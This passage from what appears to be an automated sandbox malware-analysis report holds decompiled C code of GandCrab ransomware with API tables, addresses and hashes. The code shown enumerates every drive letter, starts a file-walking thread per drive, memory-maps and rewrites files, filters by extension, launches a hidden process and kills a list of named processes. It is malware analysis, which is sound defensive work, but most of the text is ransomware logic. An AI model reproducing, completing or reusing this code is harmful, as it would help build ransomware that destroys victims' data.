						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}










                                        0x0f9d2c59
                                        0x0f9d2c5e
                                        0x0f9d2c66
                                        0x0f9d2c69
                                        0x0f9d2c70
                                        0x0f9d2c76
                                        0x0f9d2c79
                                        0x0f9d2ce9
                                        0x0f9d2cf2
                                        0x0f9d2d01
                                        0x0f9d2c7b
                                        0x0f9d2c7e
                                        0x0f9d2c9f
                                        0x0f9d2cbd
                                        0x0f9d2ccb
                                        0x0f9d2cd7
                                        0x0f9d2c80
                                        0x0f9d2c94
                                        0x0f9d2c94
                                        0x0f9d2c7e

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0F9D2C8A
                                        • BeginPaint.USER32(?,?), ref: 0F9D2C9F
                                        • lstrlenW.KERNEL32(?), ref: 0F9D2CAC
                                        • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F9D2CBD
                                        • EndPaint.USER32(?,?), ref: 0F9D2CCB
                                        • CreateThread.KERNEL32 ref: 0F9D2CE9
                                        • DestroyWindow.USER32(?), ref: 0F9D2CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                        • String ID: GandCrab!
                                        • API String ID: 572880375-2223329875
                                        • Opcode ID: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction ID: 5335b077f8efd42d98b3f5f631aed1602a0c00fb5ca3b4ea69f0767a9b87d3e7
                                        • Opcode Fuzzy Hash: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction Fuzzy Hash: 5B11C832109309AFE721DF64DC0AFAA7B6CFB49322F104616FE41D6191E7719970CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3E20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf9df348; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F9D6DE0, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F9D5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}










































                                        0x0f9d3e26
                                        0x0f9d3e38
                                        0x0f9d3e3c
                                        0x0f9d3e40
                                        0x0f9d3e4b
                                        0x0f9d3e4e
                                        0x0f9d3e50
                                        0x0f9d3e53
                                        0x0f9d3e58
                                        0x0f9d3e5c
                                        0x0f9d3e61
                                        0x0f9d3e6b
                                        0x0f9d3e6f
                                        0x0f9d3e76
                                        0x0f9d3e80
                                        0x0f9d3e84
                                        0x0f9d3e8a
                                        0x0f9d3e93
                                        0x0f9d3ea2
                                        0x0f9d3ea5
                                        0x0f9d3eb2
                                        0x0f9d3eb5
                                        0x0f9d3ebb
                                        0x0f9d3ec2
                                        0x0f9d3ecf
                                        0x0f9d3ed3
                                        0x0f9d3ed4
                                        0x0f9d3ed4
                                        0x0f9d3ed7
                                        0x0f9d3ed8
                                        0x0f9d3ee6
                                        0x0f9d3eea
                                        0x0f9d3eed
                                        0x0f9d3ef7
                                        0x0f9d3eff
                                        0x0f9d3f05
                                        0x0f9d3f0b
                                        0x0f9d3f11
                                        0x0f9d3f1b
                                        0x0f9d3f22
                                        0x0f9d3f26
                                        0x0f9d3f2a
                                        0x0f9d3f2c
                                        0x0f9d3f34
                                        0x0f9d3f3d
                                        0x0f9d3f9c
                                        0x0f9d3fa0
                                        0x0f9d3f3f
                                        0x0f9d3f3f
                                        0x0f9d3f42
                                        0x0f9d3f48
                                        0x0f9d3f4f
                                        0x0f9d3f50
                                        0x0f9d3f57
                                        0x0f9d3f5b
                                        0x0f9d3f60
                                        0x0f9d3f67
                                        0x0f9d3f6a
                                        0x0f9d3f6e
                                        0x0f9d3f78
                                        0x0f9d3f7a
                                        0x0f9d3f7e
                                        0x0f9d3f81
                                        0x0f9d3f84
                                        0x0f9d3f84
                                        0x0f9d3f84
                                        0x0f9d3f8a
                                        0x0f9d3f8e
                                        0x0f9d3f92
                                        0x0f9d3f96
                                        0x0f9d3f96
                                        0x0f9d3fa6
                                        0x0f9d3fca
                                        0x0f9d3fa8
                                        0x0f9d3fa8
                                        0x0f9d3fb2
                                        0x0f9d3fb6
                                        0x0f9d3fbd
                                        0x0f9d3fd4
                                        0x0f9d3fd8
                                        0x0f9d3ff6

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F9D3E40
                                        • GetTickCount.KERNEL32 ref: 0F9D3E65
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D3E8A
                                        • CreateThread.KERNEL32 ref: 0F9D3EC9
                                        • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F9D3F0B
                                        • GetTickCount.KERNEL32 ref: 0F9D3F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                        • String ID: ?:\
                                        • API String ID: 458387131-2533537817
                                        • Opcode ID: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction ID: e9248d09911c0c3f7bf8714baa41f22062386ceb83a21cd3c161bb01fd57d192
                                        • Opcode Fuzzy Hash: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction Fuzzy Hash: D05136709093009FD310CF18D888B5AFBE5FF89325F608A2DF58997391D375A954CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6DE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47memorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D6DE0(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F9D6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}











                                        0x0f9d6df9
                                        0x0f9d6dff
                                        0x0f9d6e0e
                                        0x0f9d6e1c
                                        0x0f9d6e30
                                        0x0f9d6e38
                                        0x0f9d6e40
                                        0x0f9d6e48
                                        0x0f9d6e56
                                        0x0f9d6e6b
                                        0x0f9d6e7b
                                        0x0f9d6e83

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F9D6DF9
                                        • wsprintfW.USER32 ref: 0F9D6E0E
                                        • InitializeCriticalSection.KERNEL32(?), ref: 0F9D6E1C
                                        • VirtualAlloc.KERNEL32 ref: 0F9D6E50
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F9D6E7B
                                        • ExitThread.KERNEL32 ref: 0F9D6E83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                        • String ID: %c:\
                                        • API String ID: 1988002015-3142399695
                                        • Opcode ID: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction ID: cd403c33321bfe05b1f8e858b5b953a9e64edd3393160eb5cd269fb2108d0eea
                                        • Opcode Fuzzy Hash: 2ee79f82eab171010b92a82065b94d47a2caada3147338485a49379818dd1f3f
                                        • Instruction Fuzzy Hash: 5101C4B5148300BBE3209F24CC8AF163BACAB45B21F204604FB659A1C2D7B89564CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2890 Relevance: 12.1, APIs: 8, Instructions: 90fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E0F9D2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F9D3030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F9D3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0F9D3030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0F9D82A0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0F9D2830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}


















                                        0x0f9d2890
                                        0x0f9d2899
                                        0x0f9d289b
                                        0x0f9d28b1
                                        0x0f9d28b6
                                        0x0f9d28f9
                                        0x0f9d2901
                                        0x0f9d28b8
                                        0x0f9d28c0
                                        0x0f9d28c3
                                        0x0f9d28ca
                                        0x0f9d28cf
                                        0x0f9d28d0
                                        0x0f9d28d8
                                        0x0f9d28e5
                                        0x0f9d28eb
                                        0x0f9d28f0
                                        0x0f9d2910
                                        0x0f9d2914
                                        0x0f9d2916
                                        0x0f9d291d
                                        0x0f9d291f
                                        0x0f9d2920
                                        0x0f9d2920
                                        0x0f9d2923
                                        0x0f9d2926
                                        0x0f9d292b
                                        0x0f9d292b
                                        0x0f9d292e
                                        0x0f9d293f
                                        0x0f9d2942
                                        0x0f9d2942
                                        0x0f9d2951
                                        0x0f9d2954
                                        0x0f9d295e
                                        0x0f9d28f2
                                        0x0f9d28f3
                                        0x00000000
                                        0x0f9d28f3
                                        0x0f9d28f0

                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0F9D2C02), ref: 0F9D28AB
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,0F9D2C02), ref: 0F9D28BA
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D28E5
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D28F3
                                        • MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0F9D2C02), ref: 0F9D290A
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F9D2C02), ref: 0F9D2942
                                        • CloseHandle.KERNEL32(?,?,?,0F9D2C02), ref: 0F9D2951
                                        • CloseHandle.KERNEL32(00000000,?,?,0F9D2C02), ref: 0F9D2954
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateView$MappingSizeUnmap
                                        • String ID:
                                        • API String ID: 265113797-0
                                        • Opcode ID: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction ID: 822f489a2f8fbf4dac1b4ed45c13d4a9ab873360c6d5d64cc8e4a0219f41615f
                                        • Opcode Fuzzy Hash: 8e576b455ec9157ecf32e980671fc580164067d028ea1d5d72608e5930a0fb66
                                        • Instruction Fuzzy Hash: BE213871A012197FE3206BB49C85F7F776CDB85676F308224FD01E32C2E6389C2149A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D6850(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf9e2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf9e2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}















                                        0x0f9d6853
                                        0x0f9d685c
                                        0x0f9d685e
                                        0x0f9d6872
                                        0x0f9d6877
                                        0x0f9d687c
                                        0x0f9d6890
                                        0x0f9d689a
                                        0x0f9d6880
                                        0x0f9d6880
                                        0x0f9d6886
                                        0x0f9d6889
                                        0x0f9d688a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d688a
                                        0x0f9d688e
                                        0x0f9d68b7
                                        0x0f9d68bf
                                        0x0f9d68c5
                                        0x0f9d68cb
                                        0x0f9d68d0
                                        0x0f9d68d6
                                        0x0f9d6922
                                        0x0f9d6929
                                        0x0f9d692c
                                        0x0f9d68d8
                                        0x0f9d68d8
                                        0x0f9d68de
                                        0x0f9d68e2
                                        0x0f9d68e4
                                        0x0f9d68e4
                                        0x0f9d68e9
                                        0x0f9d6909
                                        0x0f9d690d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d68eb
                                        0x0f9d68f0
                                        0x0f9d68f0
                                        0x0f9d68f6
                                        0x00000000
                                        0x00000000
                                        0x0f9d68fc
                                        0x0f9d68fe
                                        0x00000000
                                        0x0f9d6900
                                        0x0f9d6900
                                        0x0f9d6907
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d6907
                                        0x00000000
                                        0x0f9d68fe
                                        0x0f9d6920
                                        0x0f9d6920
                                        0x00000000
                                        0x0f9d6920
                                        0x00000000
                                        0x0f9d690f
                                        0x0f9d690f
                                        0x0f9d6913
                                        0x0f9d6916
                                        0x0f9d6919
                                        0x0f9d691e
                                        0x0f9d68de
                                        0x0f9d692f
                                        0x0f9d6937
                                        0x0f9d6946
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d688e
                                        0x0f9d6860
                                        0x0f9d6869
                                        0x0f9d6869

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F9D698A), ref: 0F9D6872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: %s
                                        • API String ID: 1659193697-4273690596
                                        • Opcode ID: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction ID: 220044b21a863b118e7884348ec18289af32a7bd8d70384166d6060dd4a1cb93
                                        • Opcode Fuzzy Hash: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction Fuzzy Hash: CA212772A0122897E7385F2CAC003F673ECEF84325FA5C126FE459B1C2E7B569908290
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4C40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0F9D4C40(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F9D9010( &_v92, 0, 0x44);
				_t15 =  *0xf9e2a6c; // 0x49c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf9e2a68; // 0x4a4
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}








                                        0x0f9d4c4c
                                        0x0f9d4c52
                                        0x0f9d4c54
                                        0x0f9d4c59
                                        0x0f9d4c5e
                                        0x0f9d4c66
                                        0x0f9d4c69
                                        0x0f9d4c6c
                                        0x0f9d4c71
                                        0x0f9d4c78
                                        0x0f9d4c7d
                                        0x0f9d4c88
                                        0x0f9d4ca7
                                        0x0f9d4cbd
                                        0x0f9d4cc8
                                        0x0f9d4ca9
                                        0x0f9d4cb3
                                        0x0f9d4cb3

                                        APIs
                                        • _memset.LIBCMT ref: 0F9D4C59
                                        • CreateProcessW.KERNEL32 ref: 0F9D4C9F
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0F9D4CA9
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CBD
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorLastProcess_memset
                                        • String ID: D
                                        • API String ID: 1393943095-2746444292
                                        • Opcode ID: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction ID: d5c176166556a1cec192e4fde72d849ed3edbaa42d9fd8a2de9c06f5343fc7d6
                                        • Opcode Fuzzy Hash: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction Fuzzy Hash: 2F016171E44318ABEB20DBA4DC05BDE7BB8EF04715F204126F608FA180E7B525648B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D48A8 Relevance: 10.5, APIs: 7, Instructions: 46stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}











                                        0x0f9d48a8
                                        0x0f9d48a8
                                        0x0f9d48b0
                                        0x0f9d48b0
                                        0x0f9d48b5
                                        0x0f9d48bd
                                        0x0f9d48cb
                                        0x0f9d48cf
                                        0x0f9d48d4
